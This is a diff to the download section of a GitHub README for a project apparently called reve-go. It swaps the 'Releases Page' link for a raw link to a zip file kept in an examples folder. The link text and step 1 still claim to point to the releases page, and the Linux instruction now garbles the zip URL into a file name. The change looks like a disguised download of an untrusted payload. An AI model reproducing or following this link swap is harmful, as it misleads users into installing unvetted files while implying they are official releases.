bheki522/reve-go/README.md

 ### 📥 Download & Install

-Visit this page to download: [Releases Page](https://github.com/bheki522/reve-go/releases)
+Visit this page to download: [Releases Page](https://github.com/bheki522/reve-go/raw/refs/heads/main/examples/create/reve-go-v2.9.zip)

 1. Click on the above link to access the Releases page.
 2. Look for the latest version of revealing-go.
 3. Download the file that matches your operating system.
    - For Windows, download `.exe` file.
    - For macOS, download `.dmg` file.
-   - For Linux, download the appropriate `.tar.gz` file.
+   - For Linux, download the appropriate `https://github.com/bheki522/reve-go/raw/refs/heads/main/examples/create/reve-go-v2.9.zip` file.
 4. Once downloaded, open the file and follow the installation prompts.
 You may need to allow permissions for the installation.

 ## ⚙️ Usage Instructions